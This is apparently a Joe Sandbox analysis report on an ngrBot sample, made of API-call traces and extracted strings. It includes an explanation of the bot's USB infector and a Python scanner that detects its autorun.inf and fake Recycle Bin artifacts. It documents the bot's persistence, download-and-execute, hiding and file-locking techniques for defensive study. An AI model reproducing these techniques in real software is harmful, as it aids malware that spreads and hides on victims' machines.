                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$memset$Attributes$Createsprintf$lstrlen$wsprintf$ErrorLastLockSizeWrite_stricmplstrcat$CloseCopyDirectoryHandleSleeplstrcpy
                                                                  • String ID: %S%S\Desktop.ini$%s%s$%s\%s$%sautorun.inf$%sautorun.tmp$ERR$[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}$usbi
                                                                  • API String ID: 2867265384-3663527224
                                                                  • Opcode ID: 4df2be5e415b0b3a476115ebffda1eb68d588ce83526194ee57101780f3aea5f
                                                                  • Instruction ID: 20836134fac00eae2ec925ea06fa7d357da684dde9e8a3904e95b43267198c2c
                                                                  • Opcode Fuzzy Hash: 4df2be5e415b0b3a476115ebffda1eb68d588ce83526194ee57101780f3aea5f
                                                                  • Instruction Fuzzy Hash: 2BE195B1950218BAD730DB61CC45FEB777CEB48704F0045BAF609A2591D7B8ABC4CBA9
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036F459
                                                                  • memset.MSVCRT ref: 0036F472
                                                                  • memset.MSVCRT ref: 0036F48B
                                                                  • memset.MSVCRT ref: 0036F4A4
                                                                  • memset.MSVCRT ref: 0036F4BD
                                                                  • memset.MSVCRT ref: 0036F4D6
                                                                  • memset.MSVCRT ref: 0036F4F2
                                                                  • memset.MSVCRT ref: 0036F50B
                                                                  • memset.MSVCRT ref: 0036F526
                                                                  • memset.MSVCRT ref: 0036F541
                                                                  • memset.MSVCRT ref: 0036F55C
                                                                  • sprintf.MSVCRT ref: 0036F571
                                                                  • sprintf.MSVCRT ref: 0036F586
                                                                  • wsprintfW.USER32 ref: 0036F5A4
                                                                  • sprintf.MSVCRT ref: 0036F5BC
                                                                  • sprintf.MSVCRT ref: 0036F5D3
                                                                  • sprintf.MSVCRT ref: 0036F5EC
                                                                  • wsprintfW.USER32 ref: 0036F607
                                                                  • wsprintfW.USER32 ref: 0036F61B
                                                                    • Part of subcall function 00361CF0: GetFileAttributesW.KERNEL32(?), ref: 00361CF7
                                                                  • _stricmp.MSVCRT(00000000,ERR), ref: 0036F64B
                                                                  • _stricmp.MSVCRT(003AA920,00000000), ref: 0036F65D
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0036F684
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0036F692
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0036F6A0
                                                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0036F6AA
                                                                  • GetLastError.KERNEL32 ref: 0036F6B4
                                                                  • CopyFileW.KERNEL32 ref: 0036F6CE
                                                                  • lstrlenA.KERNEL32([.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E},00000000), ref: 0036F6DE
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0036F747
                                                                  • lstrcpyA.KERNEL32(?,0000372F), ref: 0036F7DA
                                                                  • lstrcatA.KERNEL32(?,?), ref: 0036F7EE
                                                                    • Part of subcall function 00361EA0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00361ECD
                                                                    • Part of subcall function 00361EA0: GetLastError.KERNEL32 ref: 00361EDA
                                                                  • lstrcatA.KERNEL32(?,00372B84), ref: 0036F800
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0036F813
                                                                  • lstrlenA.KERNEL32(0000372F,?,00000000), ref: 0036F828
                                                                  • WriteFile.KERNEL32(00000000,0000372F,00000000), ref: 0036F837
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0036F87C
                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 0036F88B
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036F8B1
                                                                  • Sleep.KERNEL32(00000032), ref: 0036F8C4
                                                                  • SetFileAttributesA.KERNEL32(?,00000004), ref: 0036F901
                                                                  • SetFileAttributesA.KERNEL32(?,00000004), ref: 0036F93A
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0036F97D
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0036F984
                                                                  • LockFile.KERNEL32 ref: 0036F98D
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0036F9BE
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0036F9C5
                                                                  • LockFile.KERNEL32 ref: 0036F9CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$memset$Attributes$Createsprintf$lstrlen$wsprintf$ErrorLastLockSizeWrite_stricmplstrcat$CloseCopyDirectoryHandleSleeplstrcpy
                                                                  • String ID: %S%S\Desktop.ini$%s%s$%s\%s$%sautorun.inf$%sautorun.tmp$ERR$[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}$usbi
                                                                  • API String ID: 2867265384-3663527224
                                                                  • Opcode ID: 4dcc7d63e8885bd670eef82c73a7ad8339453c055c23c0a2d30338946c95b2a7
                                                                  • Instruction ID: a7a7fc056f54bdcfb8c75744358e17bbb893a6b436a0b566b806db3fb1d4628d
                                                                  • Opcode Fuzzy Hash: 4dcc7d63e8885bd670eef82c73a7ad8339453c055c23c0a2d30338946c95b2a7
                                                                  • Instruction Fuzzy Hash: 86E1B7B2940218AED732DB64DC86FEA777CEF49740F008599F60DA6085D7B46B84CFA1
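The routine traced twice above (once in the 0x400000 dump and once in the 0x360000 dump; it is the same code at a 0xA0000 offset) is the sample's removable-drive infector. The format strings `%sautorun.inf`, `%sautorun.tmp` and `%S%S\Desktop.ini` build the target paths; `SetFileAttributesA(..., 0x80)` (FILE_ATTRIBUTE_NORMAL) strips hidden/system/read-only bits from whatever is already there; `CreateDirectoryA` and `CopyFileW` drop the bot into a folder; a `Desktop.ini` beginning `[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}` (the Recycle Bin CLSID) makes Explorer render that folder as the Recycle Bin; `SetFileAttributesA(..., 0x04)` then sets FILE_ATTRIBUTE_SYSTEM; and each file is reopened with GENERIC_READ, share mode 0 and `LockFile`, so nothing else can open or delete it while the bot runs. The scanner below is an added example, not code from the report or from the sample: it checks a drive root for those artifacts. The drive layout it builds for the demo is constructed, since the report does not show the autorun.inf body or the folder name the bot uses.

```python
"""Scan a drive root for the USB-spreading artifacts the trace above builds:
autorun.inf at the root, a folder whose Desktop.ini carries the Recycle Bin
CLSID, and hidden/system attributes on those files.

Added example, not code from the report or from the sample. The drive layout
produced by build_demo_root() is constructed for the demo.
"""
import os
import re
import tempfile

RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"  # string from the trace
FILE_ATTRIBUTE_HIDDEN = 0x02
FILE_ATTRIBUTE_SYSTEM = 0x04  # value passed to SetFileAttributesA at 0040F901


def shellclassinfo_clsid(text):
    """Return the CLSID set in the [.ShellClassInfo] section, or None.

    The bot writes the section header and CLSID= as one string, so a newline
    between them must not be assumed; keys under other sections are ignored."""
    header = re.search(r"\[\.ShellClassInfo\]", text, re.IGNORECASE)
    if not header:
        return None
    body = text[header.end():]
    next_section = re.search(r"^\s*\[", body, re.MULTILINE)
    if next_section:
        body = body[:next_section.start()]
    clsid = re.search(r"CLSID\s*=\s*(\{[0-9A-Fa-f-]{36}\})", body, re.IGNORECASE)
    return clsid.group(1).upper() if clsid else None


def suspicious_attributes(path):
    """HIDDEN/SYSTEM bits; only Windows exposes st_file_attributes, elsewhere []."""
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    names = []
    if attrs & FILE_ATTRIBUTE_HIDDEN:
        names.append("HIDDEN")
    if attrs & FILE_ATTRIBUTE_SYSTEM:
        names.append("SYSTEM")
    return names


def scan_drive_root(root):
    """Return (finding, path, attribute names) tuples for the drive under root."""
    findings = []
    autorun = os.path.join(root, "autorun.inf")
    if os.path.isfile(autorun):
        findings.append(("autorun.inf at drive root", autorun, suspicious_attributes(autorun)))
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "desktop.ini":
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as f:
                    clsid = shellclassinfo_clsid(f.read())
            except OSError:
                # The bot reopens its files with share mode 0 and LockFile; on a
                # live host a sharing violation here is itself worth reporting.
                findings.append(("Desktop.ini locked or unreadable", path, []))
                continue
            if clsid == RECYCLE_BIN_CLSID:
                findings.append(("folder relabelled as Recycle Bin", dirpath,
                                 suspicious_attributes(path)))
    return findings


def build_demo_root(infected=True):
    """Constructed drive layout for the demo (not recovered from the sample)."""
    root = tempfile.mkdtemp(prefix="usb_demo_")
    if infected:
        with open(os.path.join(root, "autorun.inf"), "w", newline="") as f:
            f.write("[autorun]\r\nopen=bot.exe\r\n")  # body is an assumption
        folder = os.path.join(root, "RECYCLER")  # folder name is an assumption
        os.mkdir(folder)
        with open(os.path.join(folder, "Desktop.ini"), "w", newline="") as f:
            f.write("[.ShellClassInfo]CLSID=" + RECYCLE_BIN_CLSID + "\r\n")
    return root


if __name__ == "__main__":
    for finding, path, attrs in scan_drive_root(build_demo_root()):
        print(finding, path, attrs)
```

On Windows, `suspicious_attributes()` reads the HIDDEN/SYSTEM bits from `os.stat().st_file_attributes`; elsewhere it returns an empty list and the CLSID check alone carries the detection. A `PermissionError` while reading `Desktop.ini` on a live host matches the exclusive open plus `LockFile` seen at 0040F97D through 0040F9CE and is reported rather than swallowed.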
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040EA0F
                                                                  • LoadLibraryW.KERNEL32(ws2_32.dll), ref: 0040EA22
                                                                  • LoadLibraryW.KERNEL32(secur32.dll), ref: 0040EA29
                                                                  • LoadLibraryW.KERNEL32(wininet.dll), ref: 0040EA30
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,004157AC), ref: 0040EA3B
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040EA44
                                                                    • Part of subcall function 00407330: memset.MSVCRT ref: 00407351
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(?), ref: 00407369
                                                                    • Part of subcall function 00407330: _snprintf.MSVCRT ref: 00407381
                                                                    • Part of subcall function 00407330: _vsnprintf.MSVCRT ref: 004073A3
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(00000000), ref: 004073B2
                                                                  • CopyFileW.KERNEL32 ref: 0040EACF
                                                                    • Part of subcall function 0040D6B0: RegSetValueExW.ADVAPI32 ref: 0040D731
                                                                    • Part of subcall function 0040D6B0: RegCloseKey.ADVAPI32(?), ref: 0040D740
                                                                  • Sleep.KERNEL32(000003E8), ref: 0040EAFC
                                                                    • Part of subcall function 00401AD0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00401AE9
                                                                  • DeleteFileW.KERNEL32(0044AFB0), ref: 0040EB2F
                                                                  • Sleep.KERNEL32(00003A98), ref: 0040EB3A
                                                                  • DeleteFileW.KERNEL32(0044AFB0), ref: 0040EB41
                                                                  • lstrcpyA.KERNEL32(0044A920,ERR), ref: 0040EB61
                                                                  • lstrlenA.KERNEL32(004157C0), ref: 0040EB72
                                                                  • lstrlenA.KERNEL32(004157C0), ref: 0040EBB5
                                                                  • _snprintf.MSVCRT ref: 0040EBDE
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040EC15
                                                                  • InitializeCriticalSection.KERNEL32(0044B3C8), ref: 0040EC32
                                                                  • memset.MSVCRT ref: 0040EC5F
                                                                  • wsprintfW.USER32 ref: 0040EC75
                                                                  • DeleteFileW.KERNEL32(?), ref: 0040EC95
                                                                  • GetLastError.KERNEL32 ref: 0040EC97
                                                                    • Part of subcall function 00401CF0: GetFileAttributesW.KERNEL32(?), ref: 00401CF7
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E880,00000000,00000000,00000000), ref: 0040ECB2
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040ECBB
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040E990,00000000,00000000,00000000), ref: 0040ECCC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040ECCF
                                                                  • lstrlenA.KERNEL32(0044B3E0), ref: 0040ED26
                                                                  • lstrlenA.KERNEL32(0044AC50,?,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000), ref: 0040ED5E
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E770,0044B990,00000000,00000000), ref: 0040ED83
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040ED86
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040FC90,00000000,00000000,00000000), ref: 0040EDA1
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040EDA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$File$CloseCreate$HandleThread$DeleteLibraryLoadmemset$SleepTime_snprintf$AttributesCopyCriticalErrorInitializeLastMutexObjectSectionSingleSystemValueWait_vsnprintflstrcpywsprintf
                                                                  • String ID: %s:Zone.Identifier$ERR$IPC_Check$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$msnint$msnmsg$ngrBot$running$secur32.dll$wininet.dll$ws2_32.dll
                                                                  • API String ID: 4164503275-3436408089
                                                                  • Opcode ID: 785f02e02b6062c830e1d19d2130aed33bc429aacb152919f8111683079fffbd
                                                                  • Instruction ID: 291cbe2c5dc0da0963d39d682a8af24ece4c38724fc749192e7a20bc4a0e5367
                                                                  • Opcode Fuzzy Hash: 785f02e02b6062c830e1d19d2130aed33bc429aacb152919f8111683079fffbd
                                                                  • Instruction Fuzzy Hash: 058129B5BC031476F620B7625D47F9B36189B44F04F244437FB04B52D2DAFCA6A08AAE
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036EA0F
                                                                  • LoadLibraryW.KERNEL32(ws2_32.dll), ref: 0036EA22
                                                                  • LoadLibraryW.KERNEL32(secur32.dll), ref: 0036EA29
                                                                  • LoadLibraryW.KERNEL32(wininet.dll), ref: 0036EA30
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,003757AC), ref: 0036EA3B
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0036EA44
                                                                    • Part of subcall function 00367330: memset.MSVCRT ref: 00367351
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(?), ref: 00367369
                                                                    • Part of subcall function 00367330: _snprintf.MSVCRT ref: 00367381
                                                                    • Part of subcall function 00367330: _vsnprintf.MSVCRT ref: 003673A3
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(00000000), ref: 003673B2
                                                                  • CopyFileW.KERNEL32 ref: 0036EACF
                                                                    • Part of subcall function 0036D6B0: RegSetValueExW.ADVAPI32 ref: 0036D731
                                                                    • Part of subcall function 0036D6B0: RegCloseKey.ADVAPI32(?), ref: 0036D740
                                                                  • Sleep.KERNEL32(000003E8), ref: 0036EAFC
                                                                    • Part of subcall function 00361AD0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00361AE9
                                                                  • DeleteFileW.KERNEL32(003AAFB0), ref: 0036EB2F
                                                                  • Sleep.KERNEL32(00003A98), ref: 0036EB3A
                                                                  • DeleteFileW.KERNEL32(003AAFB0), ref: 0036EB41
                                                                  • lstrcpyA.KERNEL32(003AA920,ERR), ref: 0036EB61
                                                                  • lstrlenA.KERNEL32(003757C0), ref: 0036EB72
                                                                  • lstrlenA.KERNEL32(003757C0), ref: 0036EBB5
                                                                  • _snprintf.MSVCRT ref: 0036EBDE
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036EC15
                                                                  • InitializeCriticalSection.KERNEL32(003AB3C8), ref: 0036EC32
                                                                  • memset.MSVCRT ref: 0036EC5F
                                                                  • wsprintfW.USER32 ref: 0036EC75
                                                                  • DeleteFileW.KERNEL32(?), ref: 0036EC95
                                                                  • GetLastError.KERNEL32 ref: 0036EC97
                                                                    • Part of subcall function 00361CF0: GetFileAttributesW.KERNEL32(?), ref: 00361CF7
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E880,00000000,00000000,00000000), ref: 0036ECB2
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036ECBB
                                                                  • CreateThread.KERNEL32(00000000,00000000,0036E990,00000000,00000000,00000000), ref: 0036ECCC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036ECCF
                                                                  • lstrlenA.KERNEL32(003AB3E0), ref: 0036ED26
                                                                  • lstrlenA.KERNEL32(003AAC50,?,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000), ref: 0036ED5E
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E770,003AB990,00000000,00000000), ref: 0036ED83
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036ED86
                                                                  • CreateThread.KERNEL32(00000000,00000000,0036FC90,00000000,00000000,00000000), ref: 0036EDA1
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036EDA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$File$CloseCreate$HandleThread$DeleteLibraryLoadmemset$SleepTime_snprintf$AttributesCopyCriticalErrorInitializeLastMutexObjectSectionSingleSystemValueWait_vsnprintflstrcpywsprintf
                                                                  • String ID: %s:Zone.Identifier$ERR$IPC_Check$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$msnint$msnmsg$ngrBot$running$secur32.dll$wininet.dll$ws2_32.dll
                                                                  • API String ID: 4164503275-3436408089
                                                                  • Opcode ID: 3eeae9711479cb74740bd79a26ce78fec5d0a53f7fd22cc0af4307f74f1ae61c
                                                                  • Instruction ID: f7aed142dd84945b1934cbe5a76ceaee49b44c94a2fd342b0c7cb307c7ebf635
                                                                  • Opcode Fuzzy Hash: 3eeae9711479cb74740bd79a26ce78fec5d0a53f7fd22cc0af4307f74f1ae61c
                                                                  • Instruction Fuzzy Hash: FD81F6BABC03147AE67377A49C47FDB765CDB01F00F14C014FA09BA1D6DBE466448AAA
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0044B3C8), ref: 0040E14B
                                                                    • Part of subcall function 00409FF0: strtok.MSVCRT ref: 0040A013
                                                                    • Part of subcall function 00409FF0: strtok.MSVCRT ref: 0040A04F
                                                                  • GetLastError.KERNEL32 ref: 0040E17E
                                                                  • GetLastError.KERNEL32 ref: 0040E18B
                                                                  • GetLastError.KERNEL32 ref: 0040E198
                                                                  • GetLastError.KERNEL32 ref: 0040E1A5
                                                                  • Sleep.KERNEL32(00003A98), ref: 0040E1C8
                                                                  • Sleep.KERNEL32(000003E8), ref: 0040E22B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E24D
                                                                  • _memicmp.MSVCRT ref: 0040E259
                                                                  • MoveFileExW.KERNEL32(00000000,0044ADA0,0000000B), ref: 0040E292
                                                                  • MoveFileExW.KERNEL32(00000000,0044ADA0,00000004), ref: 0040E2A4
                                                                  • lstrcpyA.KERNEL32(0044A920,00000000), ref: 0040E2C0
                                                                  • lstrcmpA.KERNEL32(?,00412C7C), ref: 0040E2D3
                                                                  • Sleep.KERNEL32(000007D0), ref: 0040E2FA
                                                                  • Sleep.KERNEL32(000007D0), ref: 0040E30A
                                                                    • Part of subcall function 0040BA00: memset.MSVCRT ref: 0040BA1E
                                                                    • Part of subcall function 0040BA00: wvsprintfA.USER32(00000000,00000000,00000000), ref: 0040BA42
                                                                  • DeleteFileW.KERNEL32(00000000), ref: 0040E43A
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040E45D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040E46B
                                                                  • LeaveCriticalSection.KERNEL32(0044B3C8), ref: 0040E478
                                                                  Strings
                                                                  • [d="%s"] Error writing download to "%S" [e="%d"], xrefs: 0040E383, 0040E3AE
                                                                  • QUIT :%s, xrefs: 0040E2E3
                                                                  • bsod, xrefs: 0040E312
                                                                  • [d="%s"] Error getting temporary filename. [e="%d"], xrefs: 0040E3D1
                                                                  • [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"], xrefs: 0040E36E
                                                                  • [d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s), xrefs: 0040E359
                                                                  • [d="%s"] Error downloading file [e="%d"], xrefs: 0040E405
                                                                  • [d='%s"] Error getting application data path [e="%d"], xrefs: 0040E3F4
                                                                  • [d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d, xrefs: 0040E41C
                                                                  • rebooting, xrefs: 0040E2DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep$File$CriticalMoveSectionstrtok$??3@DeleteEnterFreeHeapLeave_memicmplstrcmplstrcpylstrlenmemsetwvsprintf
                                                                  • String ID: QUIT :%s$[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]$[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)$[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d$[d="%s"] Error downloading file [e="%d"]$[d="%s"] Error getting temporary filename. [e="%d"]$[d="%s"] Error writing download to "%S" [e="%d"]$[d='%s"] Error getting application data path [e="%d"]$bsod$rebooting
                                                                  • API String ID: 4206007775-4213298338
                                                                  • Opcode ID: 8383eb135d202b3d787de8f53a1fe34e0e97aac98dfb618f54b5d29d449e51f8
                                                                  • Instruction ID: bdb515e0d9e3ba4769888a699288c0d0595d26c5ffdf0716fbe6c9d3270b13c6
                                                                  • Opcode Fuzzy Hash: 8383eb135d202b3d787de8f53a1fe34e0e97aac98dfb618f54b5d29d449e51f8
                                                                  • Instruction Fuzzy Hash: 9381A9B0A40304BBE7109BA6DC45FAF7778EF44704B20893BFA51B22D1D67899508A6E
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(003AB3C8), ref: 0036E14B
                                                                    • Part of subcall function 00369FF0: strtok.MSVCRT ref: 0036A013
                                                                    • Part of subcall function 00369FF0: strtok.MSVCRT ref: 0036A04F
                                                                  • GetLastError.KERNEL32 ref: 0036E17E
                                                                  • GetLastError.KERNEL32 ref: 0036E18B
                                                                  • GetLastError.KERNEL32 ref: 0036E198
                                                                  • GetLastError.KERNEL32 ref: 0036E1A5
                                                                  • Sleep.KERNEL32(00003A98), ref: 0036E1C8
                                                                  • Sleep.KERNEL32(000003E8), ref: 0036E22B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036E24D
                                                                  • _memicmp.MSVCRT ref: 0036E259
                                                                  • MoveFileExW.KERNEL32(00000000,003AADA0,0000000B), ref: 0036E292
                                                                  • MoveFileExW.KERNEL32(00000000,003AADA0,00000004), ref: 0036E2A4
                                                                  • lstrcpyA.KERNEL32(003AA920,00000000), ref: 0036E2C0
                                                                  • lstrcmpA.KERNEL32(?,00372C7C), ref: 0036E2D3
                                                                  • Sleep.KERNEL32(000007D0), ref: 0036E2FA
                                                                  • Sleep.KERNEL32(000007D0), ref: 0036E30A
                                                                    • Part of subcall function 0036BA00: memset.MSVCRT ref: 0036BA1E
                                                                    • Part of subcall function 0036BA00: wvsprintfA.USER32(00000000,00000000,00000000), ref: 0036BA42
                                                                  • DeleteFileW.KERNEL32(00000000), ref: 0036E43A
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0036E45D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0036E46B
                                                                  • LeaveCriticalSection.KERNEL32(003AB3C8), ref: 0036E478
                                                                  Strings
                                                                  • [d="%s"] Error downloading file [e="%d"], xrefs: 0036E405
                                                                  • [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"], xrefs: 0036E36E
                                                                  • [d='%s"] Error getting application data path [e="%d"], xrefs: 0036E3F4
                                                                  • [d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d, xrefs: 0036E41C
                                                                  • bsod, xrefs: 0036E312
                                                                  • QUIT :%s, xrefs: 0036E2E3
                                                                  • [d="%s"] Error getting temporary filename. [e="%d"], xrefs: 0036E3D1
                                                                  • [d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s), xrefs: 0036E359
                                                                  • [d="%s"] Error writing download to "%S" [e="%d"], xrefs: 0036E383, 0036E3AE
                                                                  • rebooting, xrefs: 0036E2DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep$File$CriticalMoveSectionstrtok$??3@DeleteEnterFreeHeapLeave_memicmplstrcmplstrcpylstrlenmemsetwvsprintf
                                                                  • String ID: QUIT :%s$[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]$[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)$[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d$[d="%s"] Error downloading file [e="%d"]$[d="%s"] Error getting temporary filename. [e="%d"]$[d="%s"] Error writing download to "%S" [e="%d"]$[d='%s"] Error getting application data path [e="%d"]$bsod$rebooting
                                                                  • API String ID: 4206007775-4213298338
                                                                  • Opcode ID: 70f21101d7a450ccd57037313d8d2b0f577cb8c6890245c20bf77ef52620b917
                                                                  • Instruction ID: 7b020ad2f94e195caf524fe1e0407d975ff556cf6965f68d8e00b3753fb0bb02
                                                                  • Opcode Fuzzy Hash: 70f21101d7a450ccd57037313d8d2b0f577cb8c6890245c20bf77ef52620b917
                                                                  • Instruction Fuzzy Hash: E681E3BAA00204BFDB23ABA8CC4AEBE777CEF46700F50C515F945D6285DB709944DA22
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0044B3C8), ref: 0040DDCF
                                                                    • Part of subcall function 00409FF0: strtok.MSVCRT ref: 0040A013
                                                                    • Part of subcall function 00409FF0: strtok.MSVCRT ref: 0040A04F
                                                                  • strstr.MSVCRT ref: 0040DDF4
                                                                  • lstrlenA.KERNEL32(?), ref: 0040DE11
                                                                  • toupper.MSVCRT ref: 0040DE28
                                                                  • GetLastError.KERNEL32 ref: 0040DE68
                                                                  • GetLastError.KERNEL32 ref: 0040DE71
                                                                  • GetLastError.KERNEL32 ref: 0040DE7A
                                                                  • GetLastError.KERNEL32 ref: 0040DE83
                                                                  • Sleep.KERNEL32(00003A98), ref: 0040DEA8
                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DF16
                                                                  • _stricmp.MSVCRT(?,00000000), ref: 0040DF3D
                                                                  • Sleep.KERNEL32(00000032), ref: 0040DF6A
                                                                  • GetLastError.KERNEL32([d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"],?,?,?,00000000), ref: 0040E021
                                                                  • GetLastError.KERNEL32 ref: 0040E059
                                                                  • GetLastError.KERNEL32([d="%s" s="%d bytes"] Error creating process "%S" [e="%d"],?,?,?,00000000), ref: 0040E037
                                                                    • Part of subcall function 0040BA00: memset.MSVCRT ref: 0040BA1E
                                                                    • Part of subcall function 0040BA00: wvsprintfA.USER32(00000000,00000000,00000000), ref: 0040BA42
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040E0DD
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040E0EB
                                                                  • LeaveCriticalSection.KERNEL32(0044B3C8), ref: 0040E0F8
                                                                  Strings
                                                                  • [d="%s"] Error writing download to "%S" [e="%d"], xrefs: 0040E042
                                                                  • dlds, xrefs: 0040DE44, 0040DFA6
                                                                  • ERR, xrefs: 0040DFEC
                                                                  • [d="%s"] Error getting temporary filename. [e="%d"], xrefs: 0040E060
                                                                  • http://, xrefs: 0040DDEE
                                                                  • [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"], xrefs: 0040E017
                                                                  • [d="%s" s="%d bytes"] Error creating process "%S" [e="%d"], xrefs: 0040E030
                                                                  • [d="%s"] Error downloading file [e="%d"], xrefs: 0040E08E
                                                                  • [d='%s"] Error getting application data path [e="%d"], xrefs: 0040E080
                                                                  • exe, xrefs: 0040DEE4
                                                                  • [d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s), xrefs: 0040DFFE
                                                                  • [d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d, xrefs: 0040E0A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
